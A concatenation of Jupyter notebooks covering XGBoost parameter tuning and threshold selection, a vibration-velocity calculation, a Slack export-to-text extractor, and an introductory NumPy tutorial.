stds = gsearch4.cv_results_['std_test_score']
params = gsearch4.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
# + [markdown] id="Nomlm220WWmd" colab_type="text"
# #### Before proceeding, a good idea would be to re-calibrate the number of ```n_estimators``` for the updated parameters.
# + id="EQJIbIEfVqEh" colab_type="code" colab={}
#re-calibrate n_estimators
xgb_smooth = XGBClassifier(
learning_rate=0.3,
n_estimators=1000,
max_depth=9,
min_child_weight=1,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
max_delta_step=1,
objective= 'binary:logistic',
scale_pos_weight=18.291,
seed=27)
#collect parameters
xgb_param = xgb_smooth.get_xgb_params()
# + id="zQG44oMBkS3g" colab_type="code" colab={}
# %%time
cvresult = xgb.cv(xgb_param, dtrain, num_boost_round=xgb_smooth.get_params()['n_estimators'],
nfold=3,
metrics='logloss', early_stopping_rounds=10, verbose_eval=True)
# + id="Hq5aM-LEkS63" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 36} outputId="029dd033-ec3b-4202-d2c6-af9a595a12a6"
print('Best n_estimators =', cvresult.shape[0])
# + id="KgTApNLW6-Xe" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 147} outputId="47265133-3135-47b1-86c4-4a1a822152a5"
# add the optimal n_estimators to the parameters
xgb_smooth.set_params(n_estimators=cvresult.shape[0])
# + id="Jkr5JC8BkTAC" colab_type="code" colab={}
#Fit the algorithm on the data
# %time xgb_smooth.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="x6hUs6D1kTEo" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 295} outputId="94fc09b7-d068-42c2-f3bb-aa96370da1d5"
plot_importance(xgb_smooth, max_num_features = 14)
plt.show()
# + id="yOFCuWNRkTJT" colab_type="code" colab={}
#Predict training set:
dtrain_predictions = xgb_smooth.predict(X_train)
train_pred = [round(value) for value in dtrain_predictions]
#only the positive class
dtrain_predprob = xgb_smooth.predict_proba(X_train)[:,1]
#Predict test set:
dtest_predictions = xgb_smooth.predict(X_test)
test_pred = [round(value) for value in dtest_predictions]
#only the positive class
dtest_predprob = xgb_smooth.predict_proba(X_test)[:,1]
# + id="wF4pMdrl_ZWu" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 222} outputId="f9a77ace-5557-45fd-d9b9-422f7f67295f"
#Print model report:
print("\nModel Report")
print("Training Accuracy : %.4g" % accuracy_score(y_train.values, train_pred))
#print("Training Accuracy : %.4g" % accuracy_score(y_train.values, dtrain_predictions))
print("AUC Score (Train): %f" % roc_auc_score(y_train, dtrain_predprob))
print("logloss (Train): %f" % log_loss(y_train, dtrain_predprob))
print("Preliminary f1-score (Train): %f" %f1_score(y_train, dtrain_predictions))
print('')
print("Test Accuracy : %.4g" % accuracy_score(y_test.values, test_pred))
#print("Test Accuracy : %.4g" % accuracy_score(y_test.values, dtest_predictions))
print("AUC Score (Test): %f" % roc_auc_score(y_test, dtest_predprob))
print("logloss (Test): %f" % log_loss(y_test, dtest_predprob))
print("Preliminary f1-score (Test): %f" %f1_score(y_test, dtest_predictions))
# + [markdown] id="Som0zWbCJTpT" colab_type="text"
# ## NB: I stopped ```parameter tuning``` here; and proceeded onto ```Plot ROC curves```...
#
# #### The rest of the ```code``` between here and there - *and most of the above is thanks to [Analytics Vidhya](https://www.analyticsvidhya.com/blog/2016/03/complete-guide-parameter-tuning-xgboost-with-codes-python/)* - is to complete the ```tuning```; which I might do at another time.
#
# + [markdown] id="ETtoHllXGBvX" colab_type="text"
# #### The next step would be try different ```subsample``` and ```colsample_bytree``` values.
#
# > We search values from 0.8 to 1 for ```subsample``` and 0.5 through 1 for ```colsample_bytree``` because although we have not ```one-hot-encoded``` we do have 14 columns - and will add more.
#
#
# + id="2BFh1TbJGTbc" colab_type="code" colab={}
param_test5 = {
'subsample':[i/10.0 for i in range(8,11)],
'colsample_bytree':[i/10.0 for i in range(5,11)]
}
gsearch5 = GridSearchCV(estimator = XGBClassifier(learning_rate =0.3, n_estimators=353, max_depth=9, max_delta_step=1,
min_child_weight=1, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', scale_pos_weight=18.291, seed=27),
param_grid = param_test5, scoring='neg_log_loss',n_jobs=1, cv=2, verbose=2)
# + id="VYUjUgb1GTXm" colab_type="code" colab={}
# %%time
gsearch5.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="EYXikxx0GTTu" colab_type="code" colab={}
# save model to file
pickle.dump(gsearch5, open(path/'gsearch5.pickle.dat', 'wb'))
# + id="XOwch04bw5qu" colab_type="code" colab={}
# summarize results
print("Best: %f using %s" % (gsearch5.best_score_, gsearch5.best_params_))
means = gsearch5.cv_results_['mean_test_score']
stds = gsearch5.cv_results_['std_test_score']
params = gsearch5.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
# + id="NF9qdpKOGTQI" colab_type="code" colab={}
gsearch5.cv_results_, gsearch5.best_params_, gsearch5.best_score_
# + id="PL-rs88EQCOX" colab_type="code" colab={}
param_test6 = {
'colsample_bytree':[i/10.0 for i in range(5,11)]
}
gsearch6 = GridSearchCV(estimator = XGBClassifier(learning_rate =0.3, n_estimators=353, max_depth=5, max_delta_step=1,
min_child_weight=6, gamma=0.1, subsample=1.0, colsample_bytree=0.8,
objective= 'binary:logistic', scale_pos_weight=18.291,seed=27),
param_grid = param_test6, scoring='neg_log_loss',n_jobs=1, cv=2, verbose=2)
# + id="vJvvy9pERhHQ" colab_type="code" colab={}
# %%time
gsearch6.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="miop3yJgRmFM" colab_type="code" colab={}
gsearch6.cv_results_, gsearch6.best_params_, gsearch6.best_score_
# + [markdown] id="u8HW37GzGWKV" colab_type="text"
# #### Our last parameter is to apply regularization which can reduce overfitting. Though ```gamma``` is more popular and provides a substantial way of controlling complexity; we should try ```reg_alpha```.
# + id="cbZbTHsakTIQ" colab_type="code" colab={}
param_test7 = {
'reg_alpha':[0, 0.001, 0.005, 0.01, 0.05]
}
gsearch7 = GridSearchCV(estimator = XGBClassifier(learning_rate =0.3, n_estimators=353, max_depth=5, max_delta_step=1,
min_child_weight=6, gamma=0.1, subsample=1.0, colsample_bytree=1.0,
objective= 'binary:logistic', scale_pos_weight=18.291, seed=27),
param_grid = param_test7, scoring='neg_log_loss', n_jobs=1, cv=2, verbose=2)
# + id="cS1VT5TnkTDD" colab_type="code" colab={}
# %%time
gsearch7.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=True)
# + id="4hXHoBXMxDss" colab_type="code" colab={}
# summarize results
print("Best: %f using %s" % (gsearch7.best_score_, gsearch7.best_params_))
means = gsearch7.cv_results_['mean_test_score']
stds = gsearch7.cv_results_['std_test_score']
params = gsearch7.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
# + id="Ec0-F5za66KA" colab_type="code" colab={}
gsearch7.cv_results_, gsearch7.best_params_, gsearch7.best_score_
# + [markdown] id="97Um8HwBaqrG" colab_type="text"
# #### Now lets calculate a threshold and make a prediction.
# + id="G3zaTAnW66eE" colab_type="code" colab={}
#change these to what they should be
model = XGBClassifier(
learning_rate=0.2,
n_estimators=353,
max_depth=5,
min_child_weight=6,
gamma=0.1,
subsample=1.0,
colsample_bytree=1.0,
max_delta_step=1,
objective= 'binary:logistic',
scale_pos_weight=1,
reg_alpha=0,
seed=27)
# + id="6pkeV9VU66p4" colab_type="code" colab={}
model.fit(X_train, y_train, eval_metric=eval_metric, eval_set=eval_set, verbose=2)
# + [markdown] id="wWbDIFUoSvFR" colab_type="text"
# #### ```most_important``` features
# + id="GgAFVAvs66vF" colab_type="code" colab={}
plot_importance(model, max_num_features = 14)
plt.show()
# + id="Loy_Ttkp66m-" colab_type="code" colab={}
#lets predict *PROBABILITIES* on the training-set
y_pred_train = xgb_smooth.predict_proba(X_train)
# keep probabilities for the positive outcome only
y_pred_train = y_pred_train[:, 1]
# calculate roc curves
fpr, tpr, thresholds = roc_curve(y_train, y_pred_train)
#lets predict *PROBABILITIES* on the test-set
y_pred_test = xgb_smooth.predict_proba(X_test)
# keep probabilities for the positive outcome only
y_pred_test = y_pred_test[:, 1]
# calculate roc curves
fpr_t, tpr_t, thresholds_t = roc_curve(y_test, y_pred_test)
# + id="TrCi9GSK66k7" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 73} outputId="5dd41ff9-83a3-4891-b364-ddbfb6fd0cbf"
print('Training log_loss:', log_loss(y_train, y_pred_train))
print('')
print('Test log_loss:', log_loss(y_test, y_pred_test))
# + [markdown] id="S2IXQT0JS4X5" colab_type="text"
# #### Plot ROC curves for both the ```training``` and ```test``` datasets
#
# + id="zRkR9BeT66jl" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 279} outputId="56deb549-4ca0-449d-c573-37e040b3c607"
#plot
fig,ax = plt.subplots()
plt.plot([0,1],[0,1],'r-',label='Random Guess',color='orange')#,lw=3)
plt.plot(fpr,tpr,label='ROC (Train)')#,lw=3)
plt.plot(fpr_t,tpr_t,'r:',label='ROC (Test)',color='steelblue')#,lw=3)
#pyplot.scatter(fpr[ix], tpr[ix], marker='o', color='black', label='Best Train')
#pyplot.scatter(fpr_test[ix_t], tpr_test[ix_t], marker='o', color='red', label='Best Test')
plt.grid()
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.legend()
plt.show()
# + [markdown] id="gFqK7_fVTBaw" colab_type="text"
# #### Precision-Recall Curve
# + id="g3bSC68866Zf" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 73} outputId="9586f2db-11d1-4c06-d8da-7d3a5454df4b"
#for the training
# predict class values
yhat = xgb_smooth.predict(X_train)
lr_precision, lr_recall, thresh = precision_recall_curve(y_train, y_pred_train)
lr_f1, lr_auc = f1_score(y_train, yhat), auc(lr_recall, lr_precision)
# summarize scores
print(' Training Classification: f1=%.3f auc=%.3f' % (lr_f1, lr_auc))
print('')
#for the training
# predict class values
yhat_t = xgb_smooth.predict(X_test)
lr_precision_t, lr_recall_t, thresh_t = precision_recall_curve(y_test, y_pred_test)
lr_f1_t, lr_auc_t = f1_score(y_test, yhat_t), auc(lr_recall_t, lr_precision_t)
# summarize scores
print(' Test Classification: f1=%.3f auc=%.3f' % (lr_f1_t, lr_auc_t))
# + id="29RR_Nix66YC" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 279} outputId="e3a3718f-c909-4cb1-8f72-e109ee9e2672"
#plot
fig,ax = plt.subplots()
plt.plot(lr_precision,lr_recall,label='PR (Train)')#,lw=3)
plt.plot(lr_precision_t,lr_recall_t,label='PR (Test)')#,lw=3)
#pyplot.scatter(recall[ix], precision[ix], marker='o', color='black', label='Best Training')
#pyplot.scatter(recall_test[ix_t], precision_test[ix_t], marker='o', color='red', label='Best Test')
plt.xlabel('Precision')
plt.ylabel('Recall')
plt.grid()
plt.legend()
plt.show()
# + [markdown] id="MoB-bZr3TKoM" colab_type="text"
# #### Optimal Threshold
# + id="4NWG69oT66WF" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 316} outputId="57018a84-7dc2-486f-fc83-6fc5dfa91a4b"
# threshold plot
plt.plot(thresh,lr_precision[:-1],'r-',label='P (Train)',color='orange')#,lw=3)
plt.plot(thresh,lr_recall[:-1],'r-',label='R (Train)',color='steelblue')#,lw=3)
plt.plot(thresh_t,lr_precision_t[:-1],'--',label='P (Test)',color='orange')
plt.plot(thresh_t,lr_recall_t[:-1],'--',label='R (Test)',color='steelblue')
#plt.plot([0,1],[0,1],'k-',lw=2)
plt.gca().set_xbound(lower=0,upper=1)
plt.xlabel('Threshold')
plt.ylabel('Precision/Recall')
plt.legend()
plt.show()
# + [markdown] id="P2jQzqXyTWU3" colab_type="text"
# #### Threshold Tuning for F1-Score
# + id="VNIYw-nxPdm-" colab_type="code" colab={}
# apply threshold to predictions to create labels
def to_labels(pos_preds, threshold):
'''
define a function to take the prediction and threshold as an argument and return an array of integers in {0, 1}
'''
return (pos_preds >= threshold).astype(int)
# + id="zLJeaNtyPd0J" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 36} outputId="797dd92e-7167-4800-ff5b-41c9d66e998a"
# define thresholds (start, stop, step)
threshold = np.arange(0, 1, 0.002)
# evaluate each threshold
scores = [f1_score(y_train, to_labels(y_pred_train, t)) for t in threshold]
# get best threshold
ix = argmax(scores)
print('Training Threshold = %.3f, F-Score = %.5f' % (threshold[ix], scores[ix]))
# + [markdown] id="J5EU8ZgnTciA" colab_type="text"
# ## Predicting
# + [markdown] id="WdEPwWvsT7GS" colab_type="text"
# #### First on the ```train``` - 2017.
# + id="oQRYTUl-Pd-J" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 166} outputId="71926e92-5b55-492a-af1f-0f2d09e2e3f7"
print('Predicting on the Training-set with a Threshold of = %.3f' % 0.700)
train['pred'] = (xgb_smooth.predict(train[x_cols]) > 0.70).astype(int)
print(' Accuracy:',accuracy_score(train['y'],train['pred']))
#rmse = np.sqrt(mean_squared_error(y_test, preds))
print("RMSE: %f" % (mean_squared_error(train['y'],train['pred'])))
print(' f1-score for the + class:',f1_score(train['y'],train['pred']))
print(' Precision for the + class:',precision_score(train['y'],train['pred']))
print(' Recall for the + class:',recall_score(train['y'],train['pred']))
#y_pred_train = model.predict(train[x_cols])
print(' AUC:',roc_auc_score(train['y'],train['pred']))
print(' Ave. Precision:',average_precision_score(train['y'],train['pred']))
#train.head(3)
# + id="Lx7fR3-2PeK5" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 367} outputId="b22c41ae-1a77-47b6-b2f9-b6527721f178"
cnf_matrix = confusion_matrix(train['y'], train['pred'])
plot_confusion_matrix(cnf_matrix, classes=['0', '1'],
title='Confusion matrix, without normalization')
# + id="z83cpUauPeHd" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 185} outputId="92b4f065-f4e5-4130-b639-a217e82ec317"
#have a look at the built-in report
print(classification_report(train['y'], train['pred']))
# + [markdown] id="xBo7dJKETj5v" colab_type="text"
# ### Now our personal ```test``` - 4 months towards the end of 2018.
# + id="0LQutsMyPeEU" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 166} outputId="25ac8995-1bb7-4b47-9082-bc96d4704fca"
print('Predicting on the Test-set with a Threshold of = %.3f' % 0.700)
test['pred'] = (xgb_smooth.predict(test[x_cols]) > 0.700).astype(int)
print (' Accuracy:',accuracy_score(test['y'],test['pred']))
#rmse = np.sqrt(mean_squared_error(y_test, preds))
print("RMSE: %f" % (mean_squared_error(test['y'], test['pred'])))
print (' f1-score for the + class:',f1_score(test['y'],test['pred']))
print (' Precision for the + class:',precision_score(test['y'],test['pred']))
print (' Recall for the + class:',recall_score(test['y'],test['pred']))
#y_pred_test = model.predict(test[x_cols])
print (' AUC:',roc_auc_score(test['y'],test['pred']))
print (' Ave. Precision:',average_precision_score(test['y'],test['pred']))
# + id="opfkBKfAPeCM" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 367} outputId="317b76c9-fe5d-4015-d05f-ed333891546d"
cnf_matrix = confusion_matrix(test['y'], test['pred'])
plot_confusion_matrix(cnf_matrix, classes=['0', '1'],
title='Confusion matrix, without normalization')
# + id="WJT_49VIPd7V" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 185} outputId="d18f36cd-1019-4402-bd81-ff02f71f9015"
#have a look at the built-in report
print(classification_report(test['y'], test['pred']))
# + id="tDWjtHBHPd4h" colab_type="code" colab={}
print(len(prediction))
good = prediction.loc[prediction['pred'] == 1]
print(len(good))
# + id="oXZcJFBCPdx0" colab_type="code" colab={}
good.head(2)
# + id="W1BR_YV0PdvD" colab_type="code" colab={}
#save it
good[['segment_id', 'year', 'month', 'day', 'hour', 'latitude', 'longitude']].to_csv(path/'data/03_XGBoostTuning.csv',
index=False)
# + id="FdmtdJHSPdtb" colab_type="code" colab={}
# + id="Z1gVVLHnPdrh" colab_type="code" colab={}
# + id="ciLPE6du66PE" colab_type="code" colab={}
# + id="4HrjLwIYkS-V" colab_type="code" colab={}
| 03_PreliminaryTuning.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import pandas as pd
import time as time
import sys
# +
file = r"C:\Users\mdk\Desktop\93307\Ruwe trillingsdata\positie_1\20181001112633000195.txt"
start = time.time()
data = pd.read_csv(file,sep=' ',comment= '#', header = None,names=('t','x','y','z'))
elapsed_time = time.time()-start
df =data.iloc[:,1]
# +
def progress(count, total, status=''):
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * float(count) / float(total), 2)
bar = '+' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('\r[%s] %s%s ...%s' % (bar, percents, '%', status))
sys.stdout.flush()
def compute_veff_sbr(v,T,Ts=0.125, a=8):
"""
:param =df = vels (mm/s)
:param = T = sample space (s)
:param a = each a'th sample is used
"""
l = int(np.log2(v.size)+1) #nth-power
N_org = v.size
N = 2**l
t = np.linspace(0,N*T,N,endpoint=False)
v = np.pad(v,(0,N-v.size),'constant')
vibrations_fft = np.fft.fft(v)
f = np.linspace(0, 1 / T, N, endpoint=False)
f_mod=f
f_mod[f<1.0]=0.1
weight = 1 / np.sqrt(1 + (5.6 / f_mod) ** 2)
vibrations_fft_w = weight * vibrations_fft
vibrations_w = np.fft.ifft(vibrations_fft_w).real
t_sel = t[:N_org:a]
vibrations_w = vibrations_w[:N_org:a]
v_sqrd_w = vibrations_w ** 2
v_eff = np.zeros(t_sel.size)
dt = t_sel[1] - t_sel[0]
print('compute v_eff')
for i in range(t_sel.size - 1):
g_xi = np.exp(-t_sel[:i + 1][::-1] / Ts)
v_eff[i] = np.sqrt(1 / Ts * np.trapz(g_xi * v_sqrd_w[:i + 1], dx=dt))
progress(i,t_sel.size-1,"processing %s of %s" % (i + 1, t_sel.size))
idx = np.argmax(v_eff)
return v_eff[idx], t_sel, vibrations_w, v_eff
start = time.time()
compute_veff_sbr(df,T=1/400)
elapsed_time = time.time()-start
print(elapsed_time)
# -
| Untitled.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import json
from os import walk
#mypath = r'C:\Users\lenovo\Documents\IEEE WebDev\IEEE SP Web Dev Slack export May 15 2017'
mypath = input("Enter file address of logs\n")
import html.parser
html_parser = html.parser.HTMLParser()
with open(mypath + '\\' + 'users.json') as data_file:
users = json.load(data_file)
names = []
for user in users:
temp = {}
temp['name'] = user['name']
temp['id'] = user['id']
names.append(temp)
print (names)
names_list = {}
for i in names:
names_list[i['id']] = i['name']
print(names_list)
with open(mypath + '\\' + 'channels.json') as data_file:
channels_json = json.load(data_file)
channels = []
for channel in channels_json:
channels.append(channel['name'])
print (channels)
final_log = []
for channel in channels:
file = open(channel + '.txt','w')
path = mypath + '\\'+ channel
f = []
for (dirpath, dirnames, filenames) in walk(path):
f.extend(filenames)
break
log = []
for session in f:
with open(path+'\\'+session) as data_file:
data = json.load(data_file)
for mesg in data:
sub = 1
for x in mesg:
if x == 'subtype':
sub = 0
break
if mesg['type'] == 'message' and sub:
temp = {}
temp['name'] = names_list[mesg['user']]
temp['text'] = mesg['text']
temp['text'] = html_parser.unescape(temp['text'])
file.write(temp['name'] + ': ')
file.write(temp['text'] + '\n')
log.append(temp)
final_log.append(log)
file.close()
print(final_log)
| Extractor.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# **Disclaimer:** Most of the content in this notebook is coming from [www.scipy-lectures.org](http://www.scipy-lectures.org/intro/index.html)
# # NumPy
#
# [NumPy](http://www.numpy.org/) is **the** fundamental package for scientific computing with Python. It is the basic building block of most data analysis in Python and contains highly optimized routines for creating and manipulating arrays.
#
# ### Everything revolves around numpy arrays
# * **`Scipy`** adds a bunch of useful science and engineering routines that operate on numpy arrays. E.g. signal processing, statistical distributions, image analysis, etc.
# * **`pandas`** adds powerful methods for manipulating numpy arrays. Like data frames in R - but typically faster.
# * **`scikit-learn`** supports state-of-the-art machine learning over numpy arrays. Inputs and outputs of virtually all functions are numpy arrays.
# * If you want many more short exercises than the ones in this notebook - you can find 100 of them [here](http://www.labri.fr/perso/nrougier/teaching/numpy.100/)
# ## NumPy arrays vs Python arrays
#
# NumPy arrays look very similar to Pyhon arrays.
import numpy as np
a = np.array([0, 1, 2, 3])
a
# **So, why is this useful?** NumPy arrays are memory-efficient containers that provide fast numerical operations. We can show this very quickly by running a simple computation on the same two arrays.
# +
L = range(1000)
# Computing the power of the first 1000 numbers with Python arrays
# %timeit [i**2 for i in L]
# +
a = np.array(L)
# Computing the power of the first 1000 numbers with Numpy arrays
# %timeit a**2
# -
# # Creating arrays
#
# ## Manual construction of arrays
#
# You can create NumPy arrays manually almost in the same way as in Python in general.
#
# ### 1-D
a = np.array([0, 1, 2, 3])
a
a.shape
# ### 2-D, 3-D, ...
b = np.array([[0, 1, 2], [3, 4, 5]]) # 2 x 3 array
b
b.shape
c = np.array([[[1], [2]], [[3], [4]]])
c
c.shape
# ## Functions for creating arrays
#
# In practice, we rarely enter items one by one. Therefore, NumPy offers many different helper functions.
#
# ### Evenly spaced
a = np.arange(10) # 0 .. n-1 (!)
a
b = np.arange(1, 9, 2) # start, end (exclusive), step
b
# ### ... or by number of points
c = np.linspace(0, 1, 6) # start, end, num-points
c
d = np.linspace(0, 1, 5, endpoint=False)
d
# ### Common arrays
a = np.ones((3, 3)) # reminder: (3, 3) is a tuple
a
b = np.zeros((2, 2))
b
c = np.eye(3)
c
d = np.diag(np.array([1, 2, 3, 4]))
d
# ### `np.random`: random numbers (Mersenne Twister PRNG)
a = np.random.rand(4) # uniform in [0, 1]
a
b = np.random.randn(4) # Gaussian
b
np.random.seed(1234) # Setting the random seed
# # Basic data types
#
# You may have noticed that, in some instances, array elements are displayed with a trailing dot (e.g. ``2.`` vs ``2``). This is due to a difference in the data-type used:
a = np.array([1, 2, 3])
a.dtype
b = np.array([1., 2., 3.])
b.dtype
# Different data-types allow us to store data more compactly in memory, but most of the time we simply work with floating point numbers. Note that, in the example above, NumPy auto-detects the data-type from the input.
#
# You can explicitly specify which data-type you want:
c = np.array([1, 2, 3], dtype=float)
c.dtype
# The **default** data type is floating point:
a = np.ones((3, 3))
a.dtype
# There are also other types:
# Complex
d = np.array([1+2j, 3+4j, 5+6*1j])
d.dtype
# Bool
e = np.array([True, False, False, True])
e.dtype
# Strings
f = np.array(['Bonjour', 'Hello', 'Hallo',])
f.dtype # <--- strings containing max. 7 letters
# And much more...
# * ``int32``
# * ``int64``
# * ``uint32``
# * ``uint64``
# # Indexing and slicing
#
# The items of an array can be accessed and assigned to the same way as other Python sequences (e.g. lists):
a = np.arange(10)
a
a[0], a[2], a[-1]
# **Warning**: Indices begin at 0, like other Python sequences (and C/C++). In contrast, in Fortran or Matlab, indices begin at 1.
# The usual python idiom for reversing a sequence is supported:
a[::-1]
# For multidimensional arrays, indexes are tuples of integers:
a = np.diag(np.arange(3))
a
a[1, 1]
a[2, 1] = 10 # third line, second column
a
a[1]
# ### Note
#
# * In 2D, the first dimension corresponds to **rows**, the second to **columns**.
# * For multidimensional ``a``, ``a[0]`` is interpreted by taking all elements in the unspecified dimensions.
# ## Slicing: Arrays, like other Python sequences can also be sliced
a = np.arange(10)
a
a[2:9:3] # [start:end:step]
# Note that the last index is not included!
a[:4]
# All three slice components are not required: by default, `start` is 0,
# `end` is the last and `step` is 1:
a[1:3]
a[::2]
a[3:]
# A small illustrated summary of NumPy indexing and slicing...
#
# <img src="http://www.scipy-lectures.org/_images/numpy_indexing.png" width=60%>
# You can also combine assignment and slicing:
a = np.arange(10)
a[5:] = 10
a
b = np.arange(5)
a[5:] = b[::-1]
a
# # Fancy indexing
#
# NumPy arrays can be indexed with slices, but also with boolean or integer arrays (**masks**). This method is called *fancy indexing*. It creates **copies not views**.
#
# ## Using boolean masks
np.random.seed(3)
a = np.random.randint(0, 21, 15)
a
(a % 3 == 0)
mask = (a % 3 == 0)
extract_from_a = a[mask] # or, a[a%3==0]
extract_from_a # extract a sub-array with the mask
# Indexing with a mask can be very useful to assign a new value to a sub-array:
a[a % 3 == 0] = -1
a
# ## Indexing with an array of integers
a = np.arange(0, 100, 10)
a
# Indexing can be done with an array of integers, where the same index is repeated several time:
a[[2, 3, 2, 4, 2]] # note: [2, 3, 2, 4, 2] is a Python list
# New values can be assigned with this kind of indexing:
a[[9, 7]] = -100
a
# The image below illustrates various fancy indexing applications:
#
# <img src="http://www.scipy-lectures.org/_images/numpy_fancy_indexing.png" width=60%>
# # Elementwise operations
#
# NumPy provides many elementwise operations that are much quicker than comparable list comprehension in plain Python.
#
# ## Basic operations
#
# With scalars:
a = np.array([1, 2, 3, 4])
a + 1
2**a
# All arithmetic operates elementwise:
b = np.ones(4) + 1
a - b
a * b
j = np.arange(5)
2**(j + 1) - j
# ### Array multiplication is not matrix multiplication
c = np.ones((3, 3))
c * c # NOT matrix multiplication!
# Matrix multiplication
c.dot(c)
# ## Other operations
#
# ### Comparisons
a = np.array([1, 2, 3, 4])
b = np.array([4, 2, 2, 4])
a == b
a > b
# Array-wise comparisons:
a = np.array([1, 2, 3, 4])
b = np.array([4, 2, 2, 4])
c = np.array([1, 2, 3, 4])
np.array_equal(a, b)
np.array_equal(a, c)
# ### Logical operations
a = np.array([1, 1, 0, 0], dtype=bool)
b = np.array([1, 0, 1, 0], dtype=bool)
np.logical_or(a, b)
np.logical_and(a, b)
# ### Transcendental functions
a = np.arange(5)
np.sin(a)
np.log(a)
np.exp(a)
# ### Shape mismatches
a = np.arange(4)
# NBVAL_SKIP
a + np.array([1, 2])
# *Broadcasting?* We'll return to that later.
# ### Transposition
a = np.triu(np.ones((3, 3)), 1)
a
a.T
# ### The transposition is a view
#
# As a result, the following code **is wrong** and will **not make a matrix symmetric**:
#
# >>> a += a.T
#
# It will work for small arrays (because of buffering) but fail for large one, in unpredictable ways.
# # Basic reductions
#
# NumPy offers many quick functions to compute things like sum, mean, max etc.
#
# ## Computing sums
x = np.array([1, 2, 3, 4])
np.sum(x)
# Note: Certain NumPy functions can be also written at the end of an Numpy array.
x.sum()
# Sum by rows and by columns:
#
# <img src="http://www.scipy-lectures.org/_images/reductions.png" width=20%>
x = np.array([[1, 1], [2, 2]])
x
x.sum(axis=0) # columns (first dimension)
x.sum(axis=1) # rows (second dimension)
# ## Other reductions
#
# Like, `mean`, `std`, `cumsum` etc. works the same way (and take ``axis=``).
# ### Extrema
x = np.array([1, 3, 2])
x.min()
x.max()
x.argmin() # index of minimum
x.argmax() # index of maximum
# ### Logical operations
np.all([True, True, False])
np.any([True, True, False])
# Can be used for array comparisons:
a = np.zeros((100, 100))
np.any(a != 0)
np.all(a == a)
a = np.array([1, 2, 3, 2])
b = np.array([2, 2, 3, 2])
c = np.array([6, 4, 4, 5])
((a <= b) & (b <= c)).all()
# ### Statistics
x = np.array([1, 2, 3, 1])
y = np.array([[1, 2, 3], [5, 6, 1]])
x.mean()
np.median(x)
np.median(y, axis=-1) # last axis
x.std() # full population standard dev.
# ... and many more (best to learn as you go).
# # Broadcasting
#
# * Basic operations on ``numpy`` arrays (addition, etc.) are elementwise
#
# * This works on arrays of the same size. ***Nevertheless***, It's also possible to do operations on arrays of different sizes if *NumPy* can transform these arrays so that they all have the same size: this conversion is called **broadcasting**.
#
# The image below gives an example of broadcasting:
#
# <img src="http://www.scipy-lectures.org/_images/numpy_broadcasting.png" width=75%>
# Let's verify this:
a = np.tile(np.arange(0, 40, 10), (3, 1)).T
a
b = np.array([0, 1, 2])
a + b
# We have already used broadcasting without knowing it!
a = np.ones((4, 5))
a[0] = 2 # we assign an array of dimension 0 to an array of dimension 1
a
# An useful trick:
a = np.arange(0, 40, 10)
a.shape
a = a[:, np.newaxis] # adds a new axis -> 2D array
a.shape
a
a + b
# Broadcasting seems a bit magical, but it is actually quite natural to use it when we want to solve a problem whose output data is an array with more dimensions than input data.
# A lot of grid-based or network-based problems can also use broadcasting. For instance, if we want to compute the distance from the origin of points on a 10x10 grid, we can do:
x, y = np.arange(5), np.arange(5)[:, None]
distance = np.sqrt(x ** 2 + y ** 2)
distance
# Or in color:
# # Array shape manipulation
#
# Sometimes your arrays don't have the right shape. Also for this, NumPy has many solutions.
#
# ## Flattening
a = np.array([[1, 2, 3], [4, 5, 6]])
a
a.ravel()
a.T
a.T.ravel()
# Higher dimensions: last dimensions ravel out "first".
# ## Reshaping
#
# The inverse operation to flattening:
a = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]])
a
a.reshape(6, 2)
# Or,
a.reshape((6, -1)) # unspecified (-1) value is inferred
# ## Adding a dimension
#
# Indexing with the ``np.newaxis`` or ``None`` object allows us to add an axis to an array (you have seen this already above in the broadcasting section):
z = np.array([1, 2, 3])
z
z[:, np.newaxis]
z[np.newaxis, :]
# ## Dimension shuffling
a = np.arange(4*3*2).reshape(4, 3, 2)
a
a.shape
b = a.transpose(1, 2, 0)
b
b.shape
# ## Resizing
#
# Size of an array can be changed with ``ndarray.resize``:
a = np.arange(4)
a.resize((8,))
a
# # Sorting data
#
# Sorting along an axis:
